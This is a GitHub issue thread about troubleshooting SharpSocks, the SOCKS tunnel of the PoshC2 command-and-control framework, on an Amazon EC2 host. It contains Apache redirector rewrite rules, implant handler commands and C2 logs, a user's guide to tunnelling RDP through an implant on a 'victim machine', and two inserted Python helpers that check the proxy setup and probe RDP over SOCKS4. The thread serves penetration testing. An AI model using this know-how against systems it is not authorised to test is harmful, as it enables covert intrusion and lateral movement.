Closed r0b1nv4np closed 6 years ago
Can you provide an obfuscated screenshot of the PoshC2 instance, or are you running this directly with the SharpSocks ps1?
It looks as though you have the SharpSocks server on http://172.*.*.*:8080 but in the Apache Rewrite rules you are not forwarding back to port 8080?
Thank you for your response.
To clarify, I am running this from directly within PoshC2 Implant as shown in the video.
To your comment:
It looks as though you have the SharpSocks server on http://172.*.*.*:8080 but in the Apache Rewrite rules you are not forwarding back to port 8080?
I am unclear as to what I am doing wrong. To be honest, I haven't really messed around with rewrite rules before.
Here is the detailed log as requested from start to finish:
Just to clarify:
ec2-*.compute.amazonaws.com is the external hostname of the Amazon instance; 172.*.*.170 is the internal IP of the Amazon instance. When I start the C2 server, it opens port 80 accessible externally but does not open port 8080. Am I missing a firewall rule? My admin may have allowed only 80,443 to be accessible externally.
Server Options:
IP found: 172.*.*.170
[1] Enter the IP address or Hostname of the Posh C2 server (External address if using NAT) [172.*.*.170]: ec2-*.compute.amazonaws.com
[2] Do you want to use HTTPS for implant comms? [Yes]: No
[3a] Do you want to customize the beacon URLs from the default? [No]: No
[3b] Do you want to customize the beacon URLs from the Socks Proxy (SharpSocks)? [No]: No
[4] Do you want to customize the default UserAgent? [No]:
[5] Enter a new folder name for this project [PoshC2-2017-27-11-0802]: teesting
[6] Enter the default beacon time of the Posh C2 Server - 30s, 5m, 1h (10% jitter is always applied) [5s]:
[7] Enter the auto Kill Date of the implants in this format dd/MM/yyyy [11/12/2017]:
[8] Enter the HTTP port you want to use, 80/443 is highly preferable for proxying [80]:
[9] Do you want to enable sound? [Yes]:
[10] Do you want to use Clockwork SMS for new payloads? [No]:
[11] Do you want all payloads or select limited payloads that shouldnt be caught by AV? [Yes]:
Default Apache.conf generated
RewriteEngine On
Define PoshC2 <ADD_IPADDRESS_HERE>
Define SharpSocks <ADD_IPADDRESS_HERE>
RewriteRule ^/connect(.*) http://${PoshC2}/connect$1 [NC,P]
RewriteRule ^/images/static/content/(.*) http://${PoshC2}/images/static/content/$1 [NC,P]
RewriteRule ^/news/(.*) http://${PoshC2}/news/$1 [NC,P]
RewriteRule ^/webapp/static/(.*) http://${PoshC2}/webapp/static/$1 [NC,P]
RewriteRule ^/images/prints/(.*) http://${PoshC2}/images/prints/$1 [NC,P]
RewriteRule ^/wordpress/site/(.*) http://${PoshC2}/wordpress/site/$1 [NC,P]
RewriteRule ^/true/images/77/(.*) http://${PoshC2}/true/images/77/$1 [NC,P]
RewriteRule ^/holdings/office/images/(.*) http://${PoshC2}/holdings/office/images/$1 [NC,P]
RewriteRule ^/steam(.*) http://${PoshC2}/steam$1 [NC,P]
RewriteRule ^/sitemap/api/push(.*) http://${SharpSocks}/sitemap/api/push$1 [NC,P]
RewriteRule ^/visitors/upload/map(.*) http://${SharpSocks}/visitors/upload/map$1 [NC,P]
RewriteRule ^/printing/images/bin/logo(.*) http://${SharpSocks}/printing/images/bin/logo$1 [NC,P]
RewriteRule ^/update/latest/traffic(.*) http://${SharpSocks}/update/latest/traffic$1 [NC,P]
RewriteRule ^/saml/stats/update/push(.*) http://${SharpSocks}/saml/stats/update/push$1 [NC,P]
Changes made to default Apache.conf (defined addresses, added :8080 to the SharpSocks rule lines):
RewriteEngine On
Define PoshC2 ec2-*.compute.amazonaws.com
Define SharpSocks 172.*.*.170
RewriteRule ^/connect(.*) http://${PoshC2}/connect$1 [NC,P]
RewriteRule ^/images/static/content/(.*) http://${PoshC2}/images/static/content/$1 [NC,P]
RewriteRule ^/news/(.*) http://${PoshC2}/news/$1 [NC,P]
RewriteRule ^/webapp/static/(.*) http://${PoshC2}/webapp/static/$1 [NC,P]
RewriteRule ^/images/prints/(.*) http://${PoshC2}/images/prints/$1 [NC,P]
RewriteRule ^/wordpress/site/(.*) http://${PoshC2}/wordpress/site/$1 [NC,P]
RewriteRule ^/true/images/77/(.*) http://${PoshC2}/true/images/77/$1 [NC,P]
RewriteRule ^/holdings/office/images/(.*) http://${PoshC2}/holdings/office/images/$1 [NC,P]
RewriteRule ^/steam(.*) http://${PoshC2}/steam$1 [NC,P]
RewriteRule ^/sitemap/api/push(.*) http://${SharpSocks}:8080/sitemap/api/push$1 [NC,P]
RewriteRule ^/visitors/upload/map(.*) http://${SharpSocks}:8080/visitors/upload/map$1 [NC,P]
RewriteRule ^/printing/images/bin/logo(.*) http://${SharpSocks}:8080/printing/images/bin/logo$1 [NC,P]
RewriteRule ^/update/latest/traffic(.*) http://${SharpSocks}:8080/update/latest/traffic$1 [NC,P]
RewriteRule ^/saml/stats/update/push(.*) http://${SharpSocks}:8080/saml/stats/update/push$1 [NC,P]
Successful connect back from implant
New host connected: (uri=<uri>, key=<key>)
*.*.*.*:44526 | URL:http://ec2-*.compute.amazonaws.om | Time:11/27/2017 08:09:01 | PID:8404 | Sleep:5 | <hostname> <username>
SharpSocks options from within the implant handler
Select ImplantID or ALL or Comma Separated List (Enter to refresh):: 1
PS 1>: SharpSocks -Uri http://ec2-*.compute.amazonaws.com:80 -Beacon 2000 -Insecure
Local IP Address to bind to, e.g. http://172.16.0.1:80: http://172.*.*.170:8080
PS 1>:
SharpSocks console log
Command returned against host: <hostname> <username> (2017-11-27 08:12:53)
64bit implant running on 64bit machine
[+] Powershell version 5 detected. Run Invoke-DowngradeAttack to try using PS v2
Command returned against host: <hostname> <username> (2017-11-27 08:12:53)
Command issued against host: <hostname>
SharpSocks -Uri http://ec2-*.compute.amazonaws.com:80 -Beacon 2000 -Insecure -Client -Channel <channel> -Key <key> -URLs "sitemap/api/push","visitors/upload/map","printing/images/bin/logo","update/latest/traffic","saml/stats/update/push"
Command returned against host: <hostname> <username> (2017-11-27 08:13:31)
Loading Client Assembly
[+] SharpSocks client Started!
URLs:
http://ec2-*.compute.amazonaws.com/sitemap/api/push
http://ec2-*.compute.amazonaws.com/visitors/upload/map
http://ec2-*.compute.amazonaws.com/printing/images/bin/logo
http://ec2-*.compute.amazonaws.com/update/latest/traffic
http://ec2-*.compute.amazonaws.com/saml/stats/update/push
Channel: s<channel>
Key being used: <key>
Beacon: 2000
Cookies: ASP.NET_SessionId __RequestVerificationToken
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36
[-] Run StopSocks to stop the client!
Secondary Console Log for SharpSocks
Loading Server Assembly
[11/27/2017 8:13:27 AM][!] Public key for USING DEBUG SIMPLE ENCRYPTOR
[11/27/2017 8:13:27 AM][!] C2 HTTP processor listening on http://172.*.*.170:8080/
[11/27/2017 8:13:27 AM][!] Wait for Implant TCP Connect before SOCKS Proxy response is on
[+] SharpSocks server started!
Channel: <channel>
Key being used: <key>
Cookies: ASP.NET_SessionId __RequestVerificationToken
[-] Run StopSocks to stop the server!
[11/27/2017 8:13:27 AM][!] Waiting for command channel before starting SOCKS proxy
Thank you for sticking with me on this. I can provide more information if you require it.
Thanks for the thorough logs, it looks as though there may be an issue with comms on your C2 proxy setup. Could you login to the VPS and check you can see port 8080 where the socks server is, e.g. can you curl to http://${SharpSocks}:8080/sitemap/api/push for example. Otherwise it could be a firewall issue.
Everything else looks perfectly setup, if you only have 443 enabled you could try running socks over port 443 instead of 8080 even though you may want to keep it as HTTP not HTTPS, e.g. http://172.*.*.*:443 in the rewrite rules:
PS 1>: SharpSocks -Uri http://ec2-*.compute.amazonaws.com:80 -Beacon 2000 -Insecure
Local IP Address to bind to, e.g. http://172.16.0.1:80: http://172.*.*.170:443
And change the Apache RewriteRules to be:
RewriteRule ^/sitemap/api/push(.*) http://${SharpSocks}:443/sitemap/api/push$1 [NC,P]
RewriteRule ^/visitors/upload/map(.*) http://${SharpSocks}:443/visitors/upload/map$1 [NC,P]
RewriteRule ^/printing/images/bin/logo(.*) http://${SharpSocks}:443/printing/images/bin/logo$1 [NC,P]
RewriteRule ^/update/latest/traffic(.*) http://${SharpSocks}:443/update/latest/traffic$1 [NC,P]
RewriteRule ^/saml/stats/update/push(.*) http://${SharpSocks}:443/saml/stats/update/push$1 [NC,P]
One final comment, can you tail the log from the Apache server, e.g. tail -f /var/log/apache2/access.log, and send the details of this after the connection is started; however, if port 8080 is blocked by the firewall it may not show up here.
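The mismatch discussed in this exchange (SharpSocks bound to 172.*.*.170:8080 while the proxied RewriteRules pointed at the bare host, i.e. port 80) is easy to catch statically before touching the firewall. The checker below is an added example and is not code from the thread, from PoshC2 or from SharpSocks. It parses the single-line `Define` and `RewriteRule` forms the generated Apache.conf uses, expands `${PoshC2}` / `${SharpSocks}`, and reports any SharpSocks rule whose backend port differs from the bind URL given to the SharpSocks handler, any client URL path (the list the SharpSocks client prints on start) that no rule covers, and any rule missing the `[P]` proxy flag. The two configs, the hostname, the 172.31.0.170 address and the path list embedded in it are constructed to mirror the thread, not copied from a live system.

```python
import re
from urllib.parse import urlsplit

# Constructed input: a trimmed copy of the generated Apache.conf with the Define
# lines filled in but the SharpSocks rules still pointing at the bare host (port 80).
UNPATCHED_CONF = """\
RewriteEngine On
Define PoshC2 ec2-example.compute.amazonaws.com
Define SharpSocks 172.31.0.170
RewriteRule ^/connect(.*) http://${PoshC2}/connect$1 [NC,P]
RewriteRule ^/news/(.*) http://${PoshC2}/news/$1 [NC,P]
RewriteRule ^/sitemap/api/push(.*) http://${SharpSocks}/sitemap/api/push$1 [NC,P]
RewriteRule ^/visitors/upload/map(.*) http://${SharpSocks}/visitors/upload/map$1 [NC,P]
"""

# The same config after adding :8080 to the SharpSocks rules, as the thread did.
PATCHED_CONF = UNPATCHED_CONF.replace("${SharpSocks}/", "${SharpSocks}:8080/")

# Constructed: the URL paths the SharpSocks client was started with.
CLIENT_PATHS = ["sitemap/api/push", "visitors/upload/map"]

DEFINE_RE = re.compile(r"^\s*Define\s+(\S+)\s+(\S+)\s*$")
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)\s+\[([^\]]*)\]\s*$")


def parse_rewrite_conf(text):
    """Return (defines, rules). Each rule is (pattern, target, flags) with ${Var}
    expanded from the Define lines seen so far. Only the one-line forms PoshC2
    emits are handled; this is not a general Apache config parser."""
    defines, rules = {}, []
    for line in text.splitlines():
        m = DEFINE_RE.match(line)
        if m:
            defines[m.group(1)] = m.group(2)
            continue
        m = RULE_RE.match(line)
        if m:
            pattern, target, flags = m.groups()
            target = re.sub(r"\$\{(\w+)\}",
                            lambda v: defines.get(v.group(1), v.group(0)), target)
            rules.append((pattern, target,
                          {f.strip().upper() for f in flags.split(",")}))
    return defines, rules


def _port_of(parts):
    return parts.port or (443 if parts.scheme == "https" else 80)


def check_sharpsocks_proxy(conf_text, socks_bind_url, client_paths):
    """Compare the rewrite rules against the bind URL typed into the SharpSocks
    handler (e.g. http://172.31.0.170:8080) and the client URL list."""
    findings = []
    defines, rules = parse_rewrite_conf(conf_text)
    for name, value in defines.items():
        if "ADD_IPADDRESS_HERE" in value:
            findings.append("Define %s still holds the placeholder value" % name)
    socks_host = defines.get("SharpSocks")
    if socks_host is None:
        findings.append("no 'Define SharpSocks' line found")
    bind_port = _port_of(urlsplit(socks_bind_url))
    covered = set()
    for pattern, target, flags in rules:
        if "P" not in flags:
            findings.append("rule %s lacks [P]: it redirects instead of proxying" % pattern)
        t = urlsplit(target)
        if socks_host and t.hostname == socks_host.lower():
            port = _port_of(t)
            if port != bind_port:
                findings.append("rule %s forwards to port %d but SharpSocks listens on %d"
                                % (pattern, port, bind_port))
            for p in client_paths:
                if t.path.startswith("/" + p):
                    covered.add(p)
    for p in client_paths:
        if p not in covered:
            findings.append("client URL /%s has no SharpSocks rewrite rule" % p)
    return findings


if __name__ == "__main__":
    for label, conf in (("unpatched", UNPATCHED_CONF), ("patched", PATCHED_CONF)):
        print(label, check_sharpsocks_proxy(conf, "http://172.31.0.170:8080", CLIENT_PATHS) or "ok")
```

Point it at the real file with `check_sharpsocks_proxy(open("/etc/apache2/sites-enabled/Apache.conf").read(), ...)`. It only checks that the rules and the bind URL agree; whether Apache can actually reach that port is what the `curl` from the VPS suggested above answers.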
Sorry for the late response but I got this working with the helpful hint of using port 443.
I ditched the whole Apache rewrite rules as I could not get Apache and PoshC2 working on a single instance. I am sure it can be done and I'll mess with it when I have the time.
So basically, for anyone who reads this and is trying to set up PoshC2 on the cloud, say Amazon:
1. Set up your PoshC2 and set the server options. Make sure to use the hostname of your Amazon instance. (Though the external IP will work, some proxies don't allow IP addresses in URLs.)
2. Start an implant on the victim machine using any of the options.
3. Now, on your PoshC2 server, set up SharpSocks from the implant handler as follows:
   sharpsocks -URI http://<hostname-of-amazon-instance>:<port-accessible-from-internet> -Beacon 2000 -Insecure (I used 443 as pointed out by @benpturner)
4. http://<local-ip-of-amazon-instance>:<same-port-as-above>
The ports in steps 3 and 4 have to be the same and should be internet accessible if you are not using Apache! This is the key solution to the issue I was having.
[+] SharpSocks client Started!
URLs:
http://ec2-*.compute.amazonaws.com/sitemap/api/push
http://ec2-*.compute.amazonaws.com/visitors/upload/map
http://ec2-*.compute.amazonaws.com/printing/images/bin/logo
http://ec2-*.compute.amazonaws.com/update/latest/traffic
http://ec2-*.compute.amazonaws.com/saml/stats/update/push
Channel: s<channel>
Key being used: <key>
Beacon: 2000
Cookies: ASP.NET_SessionId __RequestVerificationToken
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36
[-] Run StopSocks to stop the client!
socks proxy listening started on 0.0.0.0:43334
Now download and install proxycap.
Create a socks4 proxy to "local-ip-of-amazon-instance" and Port 43334 (or whatever port is specified in the powershell window for your sharpsocks server console)
Allow mstsc.exe to connect through the proxy you just setup.
Start your rdp session !
@benpturner I have noticed an error while attempting to stopsocks from the server console.
C:\> stopsocks
You cannot call a method on a null-valued expression.
At C:\PowershellC2\Modules\SharpSocks.ps1:171 char:9
+ $Script:BoolStart = $Socks.Stop()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\PowershellC2\Modules\SharpSocks.ps1:172 char:9
+ $Script:BoolStart = $Socks.HARDStop()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
[-] SharpSocks stopped!
Maybe I can create a new issue for the above?
Thanks for all the help.
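The write-up above ends with ProxyCap speaking SOCKS4 to the SharpSocks listener on port 43334 and mstsc.exe going through it. Before involving ProxyCap and RDP at all, the same path can be exercised from a script, which makes it obvious whether a failure is the SOCKS hop or the RDP target. The probe below is an added example and is not code from the thread, from SharpSocks or from PoshC2. It builds the SOCKS4 CONNECT request ProxyCap would send, parses the 8-byte reply, and on a granted connection sends an X.224 Connection Request (the first packet of an RDP handshake) and checks for the Connection Confirm an RDP listener returns. The proxy address, the 10.0.0.5 target and the reply bytes in the self-test are constructed; only `rdp_reachable_via_socks4` touches the network, and nothing calls it unless you do.

```python
import socket
import struct

SOCKS4_VERSION = 0x04
SOCKS4_CMD_CONNECT = 0x01
SOCKS4_REQUEST_GRANTED = 0x5A   # 0x5B..0x5D are the rejection codes

# TPKT header + X.224 Connection Request carrying an RDP_NEG_REQ: the standard
# first packet of an RDP connection. Lengths are fixed, so it is a constant.
X224_CONNECT_REQUEST = bytes.fromhex(
    "03000013"      # TPKT: version 3, reserved, length 19 (big-endian)
    "0ee000000000"  # X.224 CR: LI=14, code 0xE0, DST-REF 0, SRC-REF 0
    "00"            # class 0
    "01000800"      # RDP_NEG_REQ: type 1, flags 0, length 8 (little-endian)
    "03000000"      # requestedProtocols: TLS | CredSSP (little-endian)
)


def build_socks4_connect(dest_ip, dest_port, user_id=b"pentest"):
    """SOCKS4 CONNECT: VN=4, CD=1, DSTPORT (BE), DSTIP, USERID, NUL.
    This is exactly what a SOCKS4 client such as ProxyCap sends."""
    return (struct.pack("!BBH4s", SOCKS4_VERSION, SOCKS4_CMD_CONNECT, dest_port,
                        socket.inet_aton(dest_ip)) + user_id + b"\x00")


def parse_socks4_reply(data):
    """Return (granted, code) from the 8-byte reply: VN=0, CD, DSTPORT, DSTIP."""
    if len(data) < 8:
        raise ValueError("short SOCKS4 reply (%d bytes)" % len(data))
    vn, cd = data[0], data[1]
    if vn != 0:
        raise ValueError("unexpected SOCKS4 reply version byte %#x" % vn)
    return cd == SOCKS4_REQUEST_GRANTED, cd


def is_x224_connection_confirm(data):
    """TPKT version 3 followed by an X.224 PDU whose code nibble is 0xD (CC)."""
    return len(data) >= 6 and data[0] == 0x03 and (data[5] & 0xF0) == 0xD0


def rdp_reachable_via_socks4(proxy_host, proxy_port, target_ip,
                             target_port=3389, timeout=10):
    """Live check: CONNECT through the SOCKS4 listener, then probe RDP.
    Returns (ok, message) so the two failure modes are distinguishable."""
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(build_socks4_connect(target_ip, target_port))
        granted, code = parse_socks4_reply(s.recv(8))
        if not granted:
            return False, "SOCKS4 CONNECT rejected with code %#x" % code
        s.sendall(X224_CONNECT_REQUEST)
        reply = s.recv(64)
        if is_x224_connection_confirm(reply):
            return True, "X.224 Connection Confirm received: RDP listener reachable"
        return False, "no Connection Confirm (%d bytes): %s" % (len(reply), reply.hex())


if __name__ == "__main__":
    # Offline self-test on constructed bytes; replace with a real call such as
    # rdp_reachable_via_socks4("172.31.0.170", 43334, "10.0.0.5") when the tunnel is up.
    print(build_socks4_connect("10.0.0.5", 3389).hex())
    print(parse_socks4_reply(bytes.fromhex("005a0000 00000000".replace(" ", ""))))
    print(is_x224_connection_confirm(bytes.fromhex("0300000b06d00000123400")))
```

A rejected CONNECT (0x5B) with the SOCKS listener reachable means the implant side could not open the target, which is the same symptom as the "Wait for Implant TCP Connect before SOCKS Proxy response" option in the server log; a granted CONNECT with no Connection Confirm means the tunnel works but nothing is listening on 3389 at the target.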
This should be all working now.
(Disclaimer: I may be messing up here)
I was testing SharpSocks and I seem to have run into issues and I'd like a little clarity on what I am doing wrong.
I am testing Posh on Amazon. I am testing against an internal Windows 10 machine.
I am using http transport.
The implant works fine when connecting to http://ec2-*.amazonaws.com
I rewrote the apache conf as follows
Here is a sample of my apache.conf
The above didn't work. I have tried a few other options but they all didn't work.
Please let me know what I am doing wrong. Would be great to have some insight into how to set this up for testing in the cloud.
Thank you.